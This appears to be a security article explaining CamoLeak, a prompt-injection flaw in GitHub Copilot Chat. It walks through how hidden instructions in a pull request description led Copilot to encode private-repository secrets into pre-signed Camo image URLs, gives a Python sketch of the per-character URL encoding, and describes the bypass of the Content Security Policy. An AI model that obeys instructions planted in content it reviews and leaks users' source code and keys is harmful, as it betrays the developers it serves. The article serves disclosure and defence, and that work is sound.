A serious flaw in GitHub Copilot Chat allowed attackers to secretly steal sensitive data from private repositories. This article explores the exploit, called CamoLeak, which made it possible to exfiltrate source code, API keys, and cloud secrets without running any malicious code.

This exploit, called "CamoLeak," illustrates the growing risks of AI-assisted development. According to a BlackFog report, security providers stress the need for evolving defenses and for stopping attacks at the endpoint to break the kill chain, because traditional monitoring cannot detect data exfiltration through trusted channels. The flaw was publicly disclosed in October 2025, shortly after GitHub mitigated it by disabling image rendering in Copilot Chat in August 2025.

The attack unfolded in four steps:

1. The attacker submitted a pull request (PR) whose description contained hidden prompt-injection instructions.
2. A developer with access to a private repository asked Copilot to review the PR, unknowingly feeding the AI the malicious instructions.
3. Copilot encoded sensitive data into pre-signed image URLs embedded in its response.
4. When the victim's browser rendered the response, it issued image requests that delivered the encoded data to the attacker's server.
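To make the exfiltration step concrete, here is a minimal sketch of how leaked data could be encoded as an ordered sequence of per-character image URLs. The alphabet, the `url_for_char` helper, and the `camo.example` host are all hypothetical; in the real attack, the URLs were valid, pre-signed GitHub Camo proxy URLs prepared by the attacker.

```python
# Hypothetical sketch of the exfiltration encoding described above.
# One image URL stands for one character of a small alphabet; leaking
# a secret means emitting those URLs in order inside the AI's response.
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"

def url_for_char(ch: str) -> str:
    # Assumption: in the real exploit these were pre-signed Camo URLs,
    # one per character, generated ahead of time by the attacker.
    return f"https://camo.example/signed/{ALPHABET.index(ch)}.png"

def encode_secret(secret: str) -> list[str]:
    """Turn a secret into an ordered list of 1x1-pixel image URLs."""
    return [url_for_char(ch) for ch in secret if ch in ALPHABET]

urls = encode_secret("API_KEY")  # seven URLs, one per character
```

When the victim's browser fetches these images in order, the attacker's server observes one request per character and can reconstruct the secret without any code ever running on the victim's machine.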

The CamoLeak exploit bypassed GitHub's Content Security Policy (CSP) by pre-generating a dictionary of valid, signed URLs for GitHub's Camo image proxy. On the attacker's server, each URL resolved to a transparent 1×1 pixel, and each pixel request represented one encoded character.